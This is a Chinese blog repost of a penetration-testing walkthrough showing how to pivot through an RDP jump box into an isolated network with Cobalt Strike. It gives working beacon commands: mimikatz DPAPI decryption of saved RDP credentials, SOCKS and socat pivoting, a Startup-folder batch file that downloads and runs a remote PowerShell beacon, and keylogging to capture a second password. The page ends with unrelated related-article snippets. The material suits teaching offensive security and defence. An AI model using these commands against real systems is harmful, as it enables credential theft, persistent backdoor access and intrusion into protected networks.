如何使用RDP跳过网络隔离?

RDP跳板渗透实战
最新推荐文章于 2024-11-15 17:01:51 发布
最新推荐文章于 2024-11-15 17:01:51 发布
阅读量82 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/h2zZhou/p/7494249.html
本文介绍了一种通过RDP跳板服务器访问隔离网络的方法。利用Cobalt Strike等工具,渗透测试人员能够获取目标网络的RDP凭据,设置代理进行远程连接,并实现对隔离网络的访问。

简介

本文我将向大家演示,如何通过RDP跳转盒进入隔离/受保护的网络。下图是我为该场景制作的拓扑图:

network.jpg

简要说明:

LAN是一种扁平的工作站和服务器网络。

一些服务器(包括RDP跳转盒)无法与Internet连接。

工作站可以通过代理访问Internet。

RDP跳转盒是LAN上唯一可以与“Secret Network(隔离网络)”通话的主机,仅限于3389端口。

rasta-lan.local和secret-lan.local是两种不同的网络。

LAN网段为:10.0.0.0/16;隔离网络网段为:172.16.0.0/24。

通过该方案,渗透测试人员可以在其渗透主机(Windows 10)上打开远程桌面连接,并利用RDP直接连接到隔离/受保护的目标服务器上。

场景预设

我们已有一个名为rasta_mouse的域用户组成员的beacon(信标)。通过查询目标服务器,以确定哪些用户/组已被授予了RDP访问权限。

beacon> powerpick Get-NetLocalGroup -ComputerName RDP01 -GroupName "Remote Desktop Users"
ComputerName : RDP01
AccountName  : rasta-lan.local/Jump Box Users
IsDomain     : True
IsGroup      : True
SID          : S-1-5-21-2294392343-2072776990-791666979-1106

谁是Jump Box(跳转盒)用户组的成员?

beacon> powerpick Get-NetGroupMember -GroupName "Jump Box Users"
GroupDomain  : rasta-lan.local
GroupName    : Jump Box Users
MemberDomain : rasta-lan.local
MemberName   : rasta_mouse_adm
MemberSID    : S-1-5-21-2294392343-2072776990-791666979-1107 IsGroup : False MemberDN : CN=Rasta Mouse (Admin),CN=Users,DC=rasta-lan,DC=local

rasta_mouse有两个单独的帐户,这意味着我们需要获取到rasta_mouse_adm的账户凭据才能继续我们下一步的操作。这里我将探讨两种可能的方法。

凭据管理器 & DPAPI

如果用户选择了保存RDP凭据,并且你也有SeDebugPrivilege权限来执行此操作,那么这将是最有趣和有效的办法。

在凭据管理器GUI中的Windows凭据:

cred-manager.jpg

你也可以在命令行上获取:

beacon> shell vaultcmd /listcreds:"Windows Credentials" /all
Credentials in vault: Windows Credentials
Credential schema: Windows Domain Password Credential
Resource: Domain:target=TERMSRV/rdp01
Identity: LAN\rasta_mouse_adm
Hidden: No
Roaming: No Property (schema element id,value): (100,2)

这些凭据存储在用户目录C:\Users\<username>\AppData\Local\Microsoft\Credentials\*中。

beacon> powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force
    Directory: C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-       02/09/2017     13:37            412 2647629F5AA74CD934ECD2F88D64ECD0
-a-hs-       30/08/2017     19:28          11204 DFBE70A7E5CC19A398EBF1B96859CE5D

现在我们来查看C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 。

beacon> mimikatz dpapi::cred /in:C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {6515c6ef-60cd-4563-a3d5-3d70a6bc6992} dwFlags : 20000000 - 536870912 (system ; ) dwDescriptionLen : 00000030 - 48 szDescription : Local Credential Data algCrypt : 00006603 - 26115 (CALG_3DES) dwAlgCryptLen : 000000c0 - 192 dwSaltLen : 00000010 - 16 pbSalt : be072ec0f54a6ceaffd09fe2275d72f9 dwHmacKeyLen : 00000000 - 0 pbHmackKey : algHash : 00008004 - 32772 (CALG_SHA1) dwAlgHashLen : 000000a0 - 160 dwHmac2KeyLen : 00000010 - 16 pbHmack2Key : a3579f9e295013432807757d3bcdf82e dwDataLen : 000000d8 - 216 pbData : 0bad8cb788a364061fa1eff57c3cbc83c8aa198c95537f66f2f973c8fe5e7210626c58423b84b55f604cff2b23165b690ad7fa7ad03d80051cb7c1a0e987f36586ede1bd7ff7e2b9f1d3cbc4b8f1b8557ab1be3402d3bfe39b1682353504ff156615b44ea83aa173c3f7830b65bf9202d823932ca69413fcb8bca1a76893c7cbab7e0ee0bbe9269a8b9f65e88e099334177be15cf977a44b77ba6e829c89303ef4764f5fd661e722c7508ad2e01a41f9cd079fc7ce5a8dba90c94a2314941674ad47567bd9c980548f809fe72ce4895b6a56cb9148c47afb dwSignLen : 00000014 - 20 pbSign : 43559a2b2e9b11bc4b56828a1d2ece489c9dfd52

以上我们需要关注的是pbData和guidMasterKey的信息。pbData是我们要解密的数据,guidMasterKey是解密所需要的密钥。

这里LSASS已经在其缓存中存有这个key – 因此我们可以使用SeDebugPrivilege获取。

beacon> mimikatz !sekurlsa::dpapi

在输出信息中,我们找到了我们需要的GUID和关联的MasterKey。

[00000000]
     * GUID      :  {6515c6ef-60cd-4563-a3d5-3d70a6bc6992}
     * Time      :  02/09/2017 13:37:51
     * MasterKey :  95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
     * sha1(key) :  89f35906909d78c84ba64af38a2bd0d1d96a0726

如果我们在交互模式下运行mimikatz,它会自动将这些密钥添加到我们的dpapi缓存中,并在尝试解密凭据时使用它们。但是,通过Cobalt Strike运行mimikatz不允许我们保留相同的会话(至少我不知道该如何保留)。所以,我们必须要拿到key并手动使用它。

beacon> mimikatz dpapi::cred /in:C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
Decrypting Credential:
 * masterkey     : 95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
**CREDENTIAL**
  credFlags      : 00000030 - 48 credSize : 000000d2 - 210 credUnk0 : 00000000 - 0 Type : 00000002 - 2 - domain_password Flags : 00000000 - 0 LastWritten : 02/09/2017 12:37:44 unkFlagsOrSize : 00000030 - 48 Persist : 00000002 - 2 - local_machine AttributeCount : 00000000 - 0 unk0 : 00000000 - 0 unk1 : 00000000 - 0 TargetName : Domain:target=TERMSRV/rdp01 UnkData : (null) Comment : (null) TargetAlias : (null) UserName : LAN\rasta_mouse_adm CredentialBlob : Sup3rAw3s0m3Passw0rd! <--- BOOM! Attributes : 0

RDP01

这些凭据将用于RDP进入跳转盒 – 因为是直接从我们的渗透机器上这样做。所以,我们先在我们当前的信标上设置一个SOCKS代理。

beacon> socks 1337
[+] started SOCKS4a server on: 1337
  • SSH进入你的Teamserver,并安装socat和proxychains(如果还未安装)。
  • 修改proxychains.conf配置文件,以在端口1337上使用127.0.0.1。
  • 然后用proxychains运行socat – > proxychains -> proxychains socat TCP4-LISTEN:3389,fork TCP4:10.0.0.100:3389。

这将允许我们的Teamserver在3389端口监听,任何进入该该端口的流量,都将被重定向到socks代理10.0.0.100:3389上。

现在,我们已经RDP到了我们的Teamserver的IP地址,我们应该已经在jump box上了…

rdp01.jpg

Persistence

为了保持对该服务器的持久访问,我们可以进行简单的设置,以便当真正的rasta_mouse_adm用户连接时, 我们可以获取到一个SMB Beacon。

操作步骤如下:

  • 创建一个无状态PowerShell SMB Beacon payload。
  • 在你的Teamserver((web delivery))上将其托管在/smb。
  • 在我们当前的beacon创建一个Reverse Port Foward -> rportfwd 8080 178.62.56.134 80。
  • 创建C:\Users\rasta_mouse_adm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat,并写入以下内容:
powershell.exe -nop -w hidden -c "iex ((new-object net.webclient).downloadstring('http://10.0.1.200:8080/smb'))"
  • 注销RDP会话。

当真正的用户登录时,我们将会在我们屏幕上获取到以下信息:

09/02 14:19:45 visit from: 178.62.56.134  Request: GET /smb page Serves /opt/cobaltstrike/uploads/beacon.ps1 null

让我们连接到beacon。

beacon> link 10.0.0.100 [+] established link to child beacon: 10.0.0.100

link.jpg

注意:如果用户注销了,我们将会失去beacon;如果仅仅只是断开连接,那么我们将保持连接。

SECRET

现在我们已经在jump box上了,我们的目标是SECRET。那么,我们该如何进入SECRET呢?

你实际上我们可以通过键盘记录来获取到我们想要的信息,如下:

beacon> keylogger 1816 x64
Start menu
=======
remo
Remote Desktop Connection
=======
172.16.0.10
Windows Security
=======
SECRET\rasta_mouse[tab]Passw0rd!

停止当前Beacon中的SOCKS代理,以及Teamserver上的proxychains/socat。

在jump box上启动一个新的SOCKS代理(你可以使用相同的端口)。

在你的Teamserver上运行proxychains socat TCP4-LISTEN:3389,fork TCP4:172.16.0.10:3389。

像之前一样,RDP到Teamsever IP,我们将直接进入到SECRET。

mo1.jpg

总结

不要保存RDP凭据在jump boxes上,建议使用双因素身份认证。DPAPI没有足够的保护。https://t.co/1lBySQcVYt

— Matthew Dunwoody (@matthewdunwoody) September 2, 2017

转载于:https://www.cnblogs.com/h2zZhou/p/7494249.html

远端访问体系的三大神器:前置机、跳板机与堡垒机,它们有啥本质区别?
网络技术联盟站
03-30 297
网络安全和系统管理的浩瀚世界里,前置机、跳板机和堡垒机就像三位性格迥异的侠客,各自手握独特技能,守护着数字疆域的不同角落。它们的名字听起来有点像科幻电影里的角色,但实际上,它们在企业网络架构中扮演的角色可一点都不含糊。要弄清楚这三者的区别,简直就像在解一场烧脑的侦探谜案——既要看表面功能,又得深挖内在逻辑,还要结合实战场景来一探究竟!今天,我们就带上放大镜🔍,一字一句地把这三位“侠客”的底细摸透,给你一篇满满干货的深度剖析,包你读完直呼过瘾!😏。
74、网络安全与业务连续性管理全解析
最新发布
u8v9w0x1y的博客
09-07 15
本文深入解析了网络安全与业务连续性管理的关键内容,包括关键业务流程及其影响评估、业务连续性计划(BCP)的制定、灾难恢复演练的实施方法,以及实用网络资源和术语的详细介绍。通过合理规划、建设与维护网络,企业可以有效提高网络安全性和可靠性,降低因网络故障或灾难带来的损失,确保业务的持续稳定发展。同时,文章提供了丰富的网络术语总结与应用建议,帮助读者更好地理解和运用相关技术。
电脑如何用rdp协议登录服务器,如何使用rdp连接windows服务器
weixin_42410443的博客
08-13 1709
如何使用rdp连接windows服务器 内容精选换一换远程登录Windows弹性云服务器后,修改分辨率设置。不同版本的Windows操作系统,操作略有差异,本节以Windows Server 2016 标准版 64bit为例,介绍如何修改Windows弹性云服务器的分辨率。通过VNC方式登录弹性云服务器。右键单击桌面,选择“显示设置”。显示设置在“设置”界面,选择“显示”页签,单击“高级显示本章节...
(转)通过RDP隧道绕过网络限制
zyb418的专栏
07-14 614
https://www.freebuf.com/articles/system/195692.html?utm_source=tuicool&utm_medium=referral 远程桌面服务是Windows的一个组件,各种公司都使用它来为系统管理员,运维人员和远程员工提供便利。另一方面,远程桌面服务,特别是远程桌面协议(RDP),也同样为网络攻击者提供了便利。当善于渗透的攻击者在目标...
[Windows]使用RDP方式远程Windows系统
HYFarashi的博客
07-11 4635
RDP远程Windows系统
Windows的RDP远程控制
qq_41439534的博客
05-14 1万+
RDP远程桌面介绍1)客户端运行“mstsc”命令行打开“远程桌面连接”程序2)输入对方的IP地址、用户名、密码默认仅允许2个用户同时登陆,同一个用户只能登陆一个桌面单击远程桌面连接窗口的“显示选项”,可以展开控制项保存用户名,密码配置显示大小,颜色允许使用本地音频、打印机、剪切板优化远程连接的体验身份验证方式。
网络运维类面试问题
weixin_51705943的博客
09-21 2855
测试网络连通性 使用Ping命令:先Ping本地回环地址(127.0.0.1),然后是本机IP地址,接着是局域网内其他设备的IP地址,最后是外部网址(如www.baidu.com),以此确认网络的哪个环节出现问题。它提供了网络拓扑管理、性能监控、配置管理、故障诊断、安全管理等功能,支持多种网络技术和设备类型,帮助用户实现对网络的集中管理和监控。重启设备可能解决临时故障。网络监控是一种持续的监控过程,用于检测、跟踪和响应网络中的设备和服务的状态,以确保网络的可用性、性能和安全性。
计算机网络八股
Near_Start的博客
05-18 2504
面试八股及计网知识点总结
计算机网络(湖科大教书匠)
tzs1328540878的博客
12-20 1万+
计算机网络(湖科大教书匠) 本文档为教学视频【计算机网络微课堂(有字幕无背景音乐版)_哔哩哔哩_bilibili】的摘录 目录计算机网络(湖科大教书匠)一、绪论1.2 因特网概述1.2.1 网络、互连网(互联网)和因特网1.2.2 因特网发展的三个阶段1.2.3 因特网的标准化工作1.2.4 因特网的组成1.3 三种交换方式1.3.1 电路交换(Circuit Switching)1.3.2 分组交换(Packet Switching)1.3.X 报文交换(Message Switching)1.3.3
用haproxy实现RDP会话负载均衡
12-03
用haproxy实现RDP会话负载均衡 这篇文章主要针对 thinstation 方案来做测试。
内外网物理隔离的云终端解决方案初探
02-13
云终端解决方案、内外网隔离、企业解决方案
Cobalt Strike 4.8 用户指南-第九节 Pivoting(跳板)
YJ_12340的博客
11-15 1201
Pivoting,在本手册中,指的是"将一个受害机器转为其他攻击和工具的跳板"。的Beacon提供了多种pivoting选项。前提是Beacon处于交互模式。交互模式意味着一个Beacon每秒内多次连接到团队服务器。使用sleep 0命令来使Beacon进入交互模式。
断剑重铸008
09-10 287
凝聚知识结晶 编制知识网络 遇到陌生领域的知识,先别管它什么意思。首要任务是提取出对象,再关注它们的逻辑关系,形成知识网络。 所有知识它都有一个共性,首先是有什么,然后是跟你讲故事,告诉你它们都怎么了。 现实举例:什么是角膜?角膜就是人们俗称的"黑眼珠",位于眼球的正前方,形似圆球体的半透明部分。 就是角膜,黑眼珠,眼球正前方。 这样就简洁 高效 容易理解了。 前提是配合原文一起体会。 ...
FreeRDP3使用freerdp-proxy功能
WANG123_22的博客
03-28 1459
使用freerdp-proxy命令启动FreeRDP服务器,但是要先添加代理服务器的配置,查看服务器的配置,进入FreeRDP的目录。从FreeRDP官网获取最新源码。
F5-ASM-AdvWAF-RDP(Rapid Deloyment template)(三)
cengshi2474的博客
08-14 191
1,F5建策略有模版,根本个人经验,第一个策略采用RDP,不要问那么多为什么,就是个人经验。后续所有策略都是建立在该条策略上, 2,RDP 包含下苏策略,RDP策略是符合PCI标准的(国内一般不流行这个,但是国内很多标准都是抄这个标准的,所以应付一些审计这一条策略就可以了) 3,个人建立第一条策略习惯如下:版本:V13.1.1.5 4,注意点:虽然我们选了block,但是还有会有一个地方有sta...
三层网络防护的域渗透
LainWith的博客
01-07 2842
目录环境准备网络拓扑配置网卡网络联通性测试一些账号绑定host其他目标信息收集端口扫描美化扫描结果网站探测指纹识别WAF识别目录扫描siteserver 漏洞利用绕狗注入忘记密码上传木马getshell后渗透提权菜刀转msfmsf生成shellcodeAdvanced AV Evasion免杀MSF开启监听获取session进程迁移哈希明文开放的端口-3389关闭防护内网主机发现配置路由配置socks攻击内网OA系统端口扫描getshell信息收集网络信息通网情况服务信息进程信息端口信息系统信息用户信息小结
5、内网渗透之端口转发与代理工具总结
Fly_鹏程万里
06-10 5854
理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的注:文中提到的所有工具下载地址 https://github.com/Brucetg/Pentest-tools一、LCXlcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为por...
通过代理使用远程桌面(Mstcs)(转载)
热门推荐
bodybo的专栏
07-27 3万+
转载自:http://www.zfnn.com/post/451.html众所周知Windows的远程桌面(Mstcs)用的3389端口,而且这个远程桌面Mstcs 没有代理设置,很人挠头。加之该屏蔽的端口都给网管封死,QQ都不给上,只望网管在服务器上做端口映射了,恐怕是痴人说梦
Rdp虚拟化是什么?
03-20
<think>好的,用户现在问的是“Rdp虚拟化是什么?”。之前的对话历史显示,他们遇到了在Windows 7远程控制Windows Server 2003时,调用waveInOpen方法报错的问题,我给出了排查步骤,其中提到了RDP虚拟化可能的影响。现在用户进一步询问RDP虚拟化的概念,需要详细解释。 首先,我需要明确用户可能的背景。他们可能是一位开发人员或者系统管理员,在使用远程桌面时遇到了音频相关的问题,因此想了解RDP虚拟化的机制。用户可能希望理解为什么远程环境中的硬件访问会出问题,以及RDP虚拟化在此过程中扮演的角色。 接下来,我需要确保回答准确且易于理解。RDP虚拟化指的是远程桌面协议中的资源虚拟化技术,尤其是硬件设备的虚拟化。需要解释清楚它如何将本地设备映射到远程会话,以及这种映射带来的好处和限制。同时,结合用户之前的问题,可能需要说明为什么音频设备在远程会话中会出现问题,比如驱动不兼容或虚拟通道的限制。 另外,用户可能对技术细节感兴趣,比如虚拟通道的分类或数据传输机制,但也要避免过于深奥。需要分点说明核心概念、工作机制、应用场景、限制和优化方法,这样结构清晰,便于用户逐步理解。 还要注意之前的回答中提到的错误排查步骤,特别是与音频重定向相关的设置,所以在这里需要强调RDP虚拟化在音频处理上的具体应用,比如音频重定向如何工作,为什么可能出现驱动不支持的情况,以及为什么建议检查虚拟机配置或物理机测试。 最后,要确保回答符合用户的要求:使用中文,结构清晰,分步骤解释,使用适当的LaTeX格式,如独立公式用$$...$$,行内公式用$...$。例如,在解释虚拟通道时,可以用公式表示数据传输路径,增强专业性。 需要检查是否有遗漏的关键点,比如RDP虚拟化的其他资源虚拟化(如打印机、USB设备),以及安全性方面的考虑,如数据加密。同时,要指出其限制,比如对某些硬件访问的模拟不足,导致API调用失败,如用户遇到的waveInOpen错误。 总结回答的结构:定义、工作机制、主要功能、技术特点、应用场景、局限性、优化建议。确保每个部分简明扼要,使用例子帮助理解,比如视频会议中的摄像头重定向,或者文件传输的虚拟磁盘映射。 可能还需要比较其他远程协议,如VNC或Citrix,但用户没有问这个,所以简要提及即可,重点放在RDP上。最后,联系到用户之前的问题,说明为什么了解RDP虚拟化有助于解决他们的音频接口调用问题,比如驱动不匹配或虚拟通道配置不当。</think>以下是关于**RDP虚拟化**的详细解析: --- ### 一、核心定义 **RDP虚拟化(Remote Desktop Protocol Virtualization)** 是微软远程桌面协议(RDP)中的核心技术,它通过虚拟化手段将本地硬件资源(如声卡、摄像头、磁盘等)**映射**到远程会话中,使远程系统能够“感知”并使用这些设备,而无需物理存在于远程主机上。 其核心公式可抽象为: $$ \text{本地资源} \xrightarrow{\text{虚拟通道}} \text{远程会话} $$ --- ### 二、工作机制 1. **虚拟通道(Virtual Channels)** - RDP协议通过**动态虚拟通道(DVCs)**传输特定设备数据 - 例如: - 音频虚拟通道:传输麦克风输入/扬声器输出 - 剪贴板虚拟通道:同步本地与远程剪贴板 - 磁盘虚拟通道:映射本地驱动器到远程会话 2. **设备重定向** - **输入设备**:键盘/鼠标事件 → 封装为RDP数据包 → 远程系统响应 - **输出设备**:远程图形渲染 → 压缩传输 → 本地显示 --- ### 三、主要功能 | 功能类型 | 典型应用场景 | 技术实现 | |------------------|------------------------------|-----------------------------------| | **音频重定向** | 远程会议系统 | 虚拟声卡驱动 + 音频流压缩 | | **打印机映射** | 远程打印文档 | 虚拟打印机驱动 + 后台传输队列 | | **USB设备穿透** | 使用本地U盾访问远程金融系统 | USB over RDP 协议扩展 | | **图形加速** | 远程运行CAD/3D软件 | RemoteFX 技术 + GPU虚拟化 | --- ### 四、技术特点 1. **协议分层架构** ```plaintext +------------------------+ | 应用层 (API调用) | ← 用户程序(如您的C++音频应用) +------------------------+ | 虚拟设备层 (重定向驱动) | ← 生成虚拟声卡/摄像头等 +------------------------+ | 传输层 (RDP核心协议) | ← 加密压缩数据流 +------------------------+ ``` 2. **带宽优化机制** - 动态调整压缩率(例如:优先保障音频流,降低图像质量) - 缓存复用技术(减少重复数据传输) --- ### 五、局限性 1. **硬件访问限制** - 部分底层API(如`waveInOpen`)可能因以下原因失败: - 虚拟驱动未正确加载 - 远程系统缺乏对应硬件抽象层 - 示例错误:`MMSYSERR_NODRIVER`(代码0x0005) 2. **兼容性问题** - 旧系统(如Windows Server 2003)对新型虚拟化技术支持有限 - 虚拟机嵌套时可能出现二次虚拟化冲突 --- ### 六、调试建议(针对开发场景) 1. **本地化测试** ```powershell # 在远程服务器上直接运行程序(非RDP连接) # 若成功,则问题出在RDP虚拟化环节 ``` 2. **日志分析** - 启用RDP诊断日志: ``` reg add "HKLM\SOFTWARE\Microsoft\Tracing" /v RDP /t REG_DWORD /d 1 /f ``` - 日志路径:`%SystemRoot%\tracing\*.log` --- ### 七、扩展应用 - **云计算场景**:Azure虚拟桌面(AVD)基于RDP虚拟化实现多用户资源隔离 - **工业控制**:通过RDP重定向PLC编程接口到远程工程师站 --- **总结**:RDP虚拟化通过抽象层弥合了本地与远程环境间的硬件差异,但其虚拟驱动实现可能影响底层API调用。在您遇到的`waveInOpen`错误案例中,建议优先检查虚拟声卡驱动的加载状态及远程音频重定向配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值